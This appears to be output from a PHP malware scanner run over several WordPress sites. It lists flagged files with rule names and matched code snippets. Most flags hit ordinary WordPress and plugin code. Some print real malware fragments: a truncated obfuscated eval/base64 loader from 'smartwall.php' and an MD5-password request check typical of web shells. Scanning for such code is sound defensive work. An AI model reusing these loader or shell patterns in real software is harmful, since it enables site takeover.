eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-02-14 22:45:14 Modified: 2021-02-15 08:42:07 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-02-14 22:45:14 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-filesystem-direct.php Size: 16.63 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ! $overwrite && $this->exists( $destinat...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-pclzip.php Size: 196.76 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/file.php Size: 94.99 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 703 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$overrides['upload_error_handler'](&$file, $message )
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 21.96 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-debug-data.php Size: 44.38 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit php_uname Line: 553 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname( 'm' )
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
| Sign 471b95ee Line: 653 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
| Sign 471b95ee Line: 654 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/class-snoopy.php Size: 38.13 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { pre...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/File.php Size: 53.06 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 857 Dangerous Malware Signature (hash: d97f004d) |
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/Crypto32.php Size: 39.90 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) |
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/Crypto.php Size: 39.69 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) |
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff/Engine/shell.php Size: 5.25 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 2
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff/Engine/native.php Size: 15.94 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff.php Size: 13.14 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/class-requests.php Size: 30.05 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$transport[$cap_string]()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/ID3/module.audio-video.quicktime.php Size: 140.10 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 1859 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/SimplePie/Parse/Date.php Size: 20.20 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 787 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code |
$day . $fws . $month . $fws . $year . $fws .
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-04-21 15:27:36 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
